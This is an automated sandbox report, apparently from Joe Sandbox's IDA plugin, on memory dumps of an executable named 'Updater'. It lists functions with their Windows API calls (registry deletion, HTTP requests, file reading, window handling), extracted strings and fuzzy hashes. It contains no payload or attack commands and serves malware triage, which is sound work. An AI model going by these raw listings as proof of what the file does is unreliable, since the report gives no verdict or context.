Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 1189650293bb5494c30aee34ab01deabee2b3bf4d4a7f3b013f7283e2b6f2b4c
Instruction ID: 3ccccf7ff993a35c1630dcf4df17000b5db60c18c0e211e880e61c5d4a8f0e56
Opcode Fuzzy Hash: 1189650293bb5494c30aee34ab01deabee2b3bf4d4a7f3b013f7283e2b6f2b4c
Instruction Fuzzy Hash: 4C6190326042519FCB10EF25D841B6AB7F1EF98714F1085BCF85997291EB71EE06CB82

Function 00BAD3F0 Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 165COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BAD3F5
_wcslen.LIBCMT ref: 00BAD456

Strings

HKLM, xrefs: 00BAD48E, 00BAD49F
HKEY_CURRENT_USER, xrefs: 00BAD59A
HKCC, xrefs: 00BAD589
HKEY_CURRENT_CONFIG, xrefs: 00BAD53A, 00BAD54B
HKCR, xrefs: 00BAD500, 00BAD511
HKEY_USERS, xrefs: 00BAD5BC
HKEY_CLASSES_ROOT, xrefs: 00BAD4CB, 00BAD4DC
HKCU, xrefs: 00BAD5AB
HKEY_LOCAL_MACHINE, xrefs: 00BAD451, 00BAD462
HKU, xrefs: 00BAD5CD

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 176396367-909552448
Opcode ID: 54ce62dd2d0c6fcc6c12077b82bc35f4d54890b40503649884763aae6d7bbc14
Instruction ID: ed07515cda5bb210a0db9e855761d4700ca7950db8a690e70804dc1b8e52d1d6
Opcode Fuzzy Hash: 54ce62dd2d0c6fcc6c12077b82bc35f4d54890b40503649884763aae6d7bbc14
Instruction Fuzzy Hash: 4551B333E0855247CB24AF28A9112BA33E1EB76708F5441E9EC1B1BB58EF31AD469781

Function 00B869F9 Relevance: 27.2, APIs: 18, Instructions: 195windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00B86A0C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B86A1D
SetWindowTextW.USER32(?,?), ref: 00B86A35
GetDlgItem.USER32(?,000003EA), ref: 00B86A4B
SetWindowTextW.USER32(00000000,?), ref: 00B86A51
GetDlgItem.USER32(?,000003E9), ref: 00B86A61
SetWindowTextW.USER32(00000000,?), ref: 00B86A67
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B86A88
SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 00B86AA1
GetWindowRect.USER32(?,?), ref: 00B86AAA
_wcslen.LIBCMT ref: 00B86B0A
GetDesktopWindow.USER32 ref: 00B86B48
GetWindowRect.USER32(00000000), ref: 00B86B4F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$Item$MessageSendText$Rect$DesktopIconLoad_wcslen
String ID:
API String ID: 2606896325-0
Opcode ID: e8f0a776a279aa43e01f9a682f6457620e95ebddda690a59911d6cd96d9bc66c
Instruction ID: 1a7e46eb375102b7fa5654ddb145f1a8e5887c344dd299ccdc7890aff56095d6
Opcode Fuzzy Hash: e8f0a776a279aa43e01f9a682f6457620e95ebddda690a59911d6cd96d9bc66c
Instruction Fuzzy Hash: F9718F71A00609AFDB24EFA8CD86BAEBBF5FF48704F104558E546A31A0EB75ED40CB10

Function 00BA09D7 Relevance: 27.1, APIs: 18, Instructions: 129COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00BA09F0
LoadCursorW.USER32(00000000,00007F8A), ref: 00BA09FB
LoadCursorW.USER32(00000000,00007F00), ref: 00BA0A06
LoadCursorW.USER32(00000000,00007F03), ref: 00BA0A11
LoadCursorW.USER32(00000000,00007F8B), ref: 00BA0A1C
LoadCursorW.USER32(00000000,00007F01), ref: 00BA0A27
LoadCursorW.USER32(00000000,00007F81), ref: 00BA0A32
LoadCursorW.USER32(00000000,00007F88), ref: 00BA0A3D
LoadCursorW.USER32(00000000,00007F80), ref: 00BA0A48
LoadCursorW.USER32(00000000,00007F86), ref: 00BA0A53
LoadCursorW.USER32(00000000,00007F83), ref: 00BA0A5E
LoadCursorW.USER32(00000000,00007F85), ref: 00BA0A69
LoadCursorW.USER32(00000000,00007F82), ref: 00BA0A74
LoadCursorW.USER32(00000000,00007F84), ref: 00BA0A7F
LoadCursorW.USER32(00000000,00007F04), ref: 00BA0A8A
LoadCursorW.USER32(00000000,00007F02), ref: 00BA0A95
GetCursorInfo.USER32(?), ref: 00BA0AA5
GetLastError.KERNEL32 ref: 00BA0AE7

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: ef5fc1b8e7f888cb788d3d6bf54e51931bb9ac87db46abf77ad80f474c5daca2
Instruction ID: ed766e677cbc720eb5293bd915decb8c6900246175d6d899ca2f2684209ca08e
Opcode Fuzzy Hash: ef5fc1b8e7f888cb788d3d6bf54e51931bb9ac87db46abf77ad80f474c5daca2
Instruction Fuzzy Hash: B2415470D083196ADB10DFBA8C85D5EBFE8FF04754F50456AE11CE7281DA789901CE91

Function 00B84198 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 362COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B8423F
_wcslen.LIBCMT ref: 00B842AC
_wcslen.LIBCMT ref: 00B84310

Strings

REGEXPCLASS, xrefs: 00B8430B, 00B8431E
CLASSNN, xrefs: 00B842A7, 00B842BA
CLASS, xrefs: 00B8423A, 00B84256
NAME, xrefs: 00B843D9, 00B843EC
TEXT, xrefs: 00B8452D
INSTANCE, xrefs: 00B844FF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 076743b3bd31548001306a2de790912560128820e988beed2b758b9b217dbfbe
Instruction ID: 49fe128ad2595a60e431c3487c01230d98fc767d8321de50b4ea5d7b2a699582
Opcode Fuzzy Hash: 076743b3bd31548001306a2de790912560128820e988beed2b758b9b217dbfbe
Instruction Fuzzy Hash: 6FD1A471E001179BCB18EFA4D481BEEB7F5FF15304F5081A9E85AA7221EB30AE59DB50

Function 00B950A6 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 259COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B9510A
_wcslen.LIBCMT ref: 00B95119
_wcslen.LIBCMT ref: 00B9515A
_wcslen.LIBCMT ref: 00B9519A
_wcslen.LIBCMT ref: 00B951DA
_wcslen.LIBCMT ref: 00B95217
GetDriveTypeW.KERNEL32(?,00BE7A20), ref: 00B952A8

Strings

all, xrefs: 00B95114, 00B95125
ramdisk, xrefs: 00B9524E
fixed, xrefs: 00B951D5, 00B951E6
network, xrefs: 00B95212, 00B95223
unknown, xrefs: 00B95267
cdrom, xrefs: 00B95155, 00B95166
removable, xrefs: 00B95195, 00B951A6

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 38e864b3b3b54cac7c7bf1008ffd845c5a05f1f46b95cb4cebe755eff91a018e
Instruction ID: 364d3f1ba5acf1cfd0b3f59e5de3b00a2cf77b7fb7d5ff58050c77a8cec189a6
Opcode Fuzzy Hash: 38e864b3b3b54cac7c7bf1008ffd845c5a05f1f46b95cb4cebe755eff91a018e
Instruction Fuzzy Hash: F19108369482209FCB25DF28D881B6AB7E4EF50704F1444FCF85A6B251EB71DD46CB92

Function 00B4071E Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 00B4073A
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B4074B
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B40761
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B4076F
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B4077D
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B407D3
___scrt_fastfail.LIBCMT ref: 00B407E8
DeleteCriticalSection.KERNEL32(00BF16CC,00000007), ref: 00B407F3
CloseHandle.KERNEL32(00000000), ref: 00B40803

Strings

kernel32.dll, xrefs: 00B40746
InitializeConditionVariable, xrefs: 00B4075B
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B40735
SleepConditionVariableCS, xrefs: 00B40767
WakeAllConditionVariable, xrefs: 00B40775

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AddressHandleProc$Module$CloseCreateCriticalDeleteEventSection___scrt_fastfail
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2238755874-1714406822
Opcode ID: db79a7c56510a1ddeb36e8970129066e0ae13577c9ba5416cf5c81923cd39217
Instruction ID: a5b91dc16e8a5a463fc586077dbc47e1a479160680811cc4e3bc2861920af8ef
Opcode Fuzzy Hash: db79a7c56510a1ddeb36e8970129066e0ae13577c9ba5416cf5c81923cd39217
Instruction Fuzzy Hash: 3A21EB72A61311BBD72077BD9C49F3A26D8DB44B51F090AB5FE01E71A0DEB4DD00DA91

Function 00BA4BE7 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 479libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4CB9
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BA4CCB
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?), ref: 00BA4CF0
FreeLibrary.KERNEL32(00000000), ref: 00BA4D3C
StringFromGUID2.OLE32(?,?,00000028), ref: 00BA4DA6
SysFreeString.OLEAUT32(00000009), ref: 00BA4E60
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BA4EC6
SysFreeString.OLEAUT32(?), ref: 00BA4EF0

Strings

GetModuleHandleExW, xrefs: 00BA4CC5
kernel32.dll, xrefs: 00BA4CB4

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: bdc9fc3704a0cbb4d937d0fc93df8f9836f2adf1b5782b28c6a057d339f9fb18
Instruction ID: b1dd6765dd2204e9553bfe1f58bf5fb08eaeb881898150462dccd495165c9b7f
Opcode Fuzzy Hash: bdc9fc3704a0cbb4d937d0fc93df8f9836f2adf1b5782b28c6a057d339f9fb18
Instruction Fuzzy Hash: 01123B75A04105EFDB24CF54C884EAEB7F5FF86314F248098E909AB251DB71EE46CBA0

Function 00B336C0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 215windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 00B77E4B
GetMenuItemCount.USER32 ref: 00B77EFB
GetCursorPos.USER32(?), ref: 00B77F3F
SetForegroundWindow.USER32(00000000), ref: 00B77F48
TrackPopupMenuEx.USER32(?,00000000,?,00000000,00000000,00000000,?,?,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 00B77F5B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B77F67

Strings

0, xrefs: 00B336CE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: cf66bd852e61ab1837afa1555b9f7e82f77db21bb3ea77cb88e723afe7b96d27
Instruction ID: 3db2723d49746921f6a97266cda8e2f0d4aeebed44e1d9360333c58cdd2015e2
Opcode Fuzzy Hash: cf66bd852e61ab1837afa1555b9f7e82f77db21bb3ea77cb88e723afe7b96d27
Instruction Fuzzy Hash: FD71C5B1688215BBEB259F24DC89FAABFE8FF04724F204295F528661E1CBB15D10C790

Function 00BB7695 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 196windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00BB77A8

Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BB781C
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BB783E
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB7851
DestroyWindow.USER32(00000000), ref: 00BB7873
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B20000,00000000), ref: 00BB78A4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB78BD
GetDesktopWindow.USER32 ref: 00BB78D6
GetWindowRect.USER32(00000000), ref: 00BB78DD
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BB78F5
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BB790D

Part of subcall function 00B34E23: GetWindowLongW.USER32(?,000000EB), ref: 00B34E34

Strings

0, xrefs: 00BB774C
tooltips_class32, xrefs: 00BB7815, 00BB789D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: b5acacd60dc32a6af87d2bc058624ac80b31ce6075dc21fb8c08b1d8e8546255
Instruction ID: 33ed592c1b1b1291c18fd6735ad6c8b48db5128d14835e3e1f8bf40d133736fc
Opcode Fuzzy Hash: b5acacd60dc32a6af87d2bc058624ac80b31ce6075dc21fb8c08b1d8e8546255
Instruction Fuzzy Hash: 07718B70144245AFD725CF28CC48FBA77E9FB88304F1449ADF989972A1DBB4EA11CB61

Function 00B9CF5D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 144networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B9CF97
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B9CFAA
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B9CFBE
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B9CFD7
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B9D01A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B9D030
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B9D03B
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B9D06B
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B9D0C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B9D0D7
InternetCloseHandle.WININET(00000000), ref: 00B9D0E2

Strings

, xrefs: 00B9D05C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: af0f5a1094d02ddd649df09f331f1a9c7cdbb179afd97334794a3e1038d99a13
Instruction ID: 2759d438684af0853e213e4071a721845bd3dbbf7b3eded7eefdb95b499dc6c5
Opcode Fuzzy Hash: af0f5a1094d02ddd649df09f331f1a9c7cdbb179afd97334794a3e1038d99a13
Instruction Fuzzy Hash: EC515BB1500608BFDB219F62C888BAABBFCFF08354F10456AF94597250EB78DD059B61

Function 00BB8F46 Relevance: 22.6, APIs: 15, Instructions: 133filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00BB8F69
GetFileSize.KERNEL32(00000000,00000000), ref: 00BB8F80
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00BB8F8B
CloseHandle.KERNEL32(00000000), ref: 00BB8F98
GlobalLock.KERNEL32(00000000), ref: 00BB8FA1
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BB8FB0
GlobalUnlock.KERNEL32(00000000), ref: 00BB8FB9
CloseHandle.KERNEL32(00000000), ref: 00BB8FC0
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00BB8FD1
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BC0BEC,?), ref: 00BB8FEA
GlobalFree.KERNEL32(00000000), ref: 00BB8FFA
GetObjectW.GDI32(?,00000018,000000FF), ref: 00BB901E
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00BB904E
DeleteObject.GDI32(00000000), ref: 00BB9076
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BB908C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 80c6f177b627b7883658a7ad011cace91421980d7e309e649ffd083f7051d0d1
Instruction ID: e4a2e4a6b67ae1e62bb86129bf96da50d1b9b8dbca755196031ca3687b3920c1
Opcode Fuzzy Hash: 80c6f177b627b7883658a7ad011cace91421980d7e309e649ffd083f7051d0d1
Instruction Fuzzy Hash: 85412975600204AFDB109F69DC88EAABBBDFF89711F108159F905E7260EBB5AD01DB20

Function 00B92218 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 362timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00B9225D
VariantCopy.OLEAUT32(?,?), ref: 00B92266
VariantClear.OLEAUT32(?), ref: 00B92272
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B92358
VarR8FromDec.OLEAUT32(?,?), ref: 00B923B4
VariantInit.OLEAUT32(?), ref: 00B92465
SysFreeString.OLEAUT32(?), ref: 00B924E9
VariantClear.OLEAUT32(?), ref: 00B92535
VariantClear.OLEAUT32(?), ref: 00B92544
VariantInit.OLEAUT32(00000000), ref: 00B92582

Strings

Default, xrefs: 00B9240C
%4d%02d%02d%02d%02d%02d, xrefs: 00B92382

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: e496b152d6375b27b0dd4e35bbc07136dd2dce7ace91dd3b6562e24b56df6108
Instruction ID: 49afe93fba86562f2dc4e7572c9d5b7465ffc0a3716d04aacc319b2882bcf805
Opcode Fuzzy Hash: e496b152d6375b27b0dd4e35bbc07136dd2dce7ace91dd3b6562e24b56df6108
Instruction Fuzzy Hash: 49D1B871A00216EBDF14AFA5D885B79B7F4FF08700F1085E9E909AB281DB74ED44DBA1

Function 00BAC00E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00BAD398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAC0AE,?,?), ref: 00BAD3B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC0F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BAC172
RegDeleteValueW.ADVAPI32(?,?), ref: 00BAC20A
RegCloseKey.ADVAPI32(?), ref: 00BAC27E
RegCloseKey.ADVAPI32(?), ref: 00BAC29C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00BAC2F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BAC304
RegDeleteKeyW.ADVAPI32(?,?), ref: 00BAC322
FreeLibrary.KERNEL32(00000000), ref: 00BAC383
RegCloseKey.ADVAPI32(00000000), ref: 00BAC394

Strings

advapi32.dll, xrefs: 00BAC2ED
RegDeleteKeyExW, xrefs: 00BAC2FE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

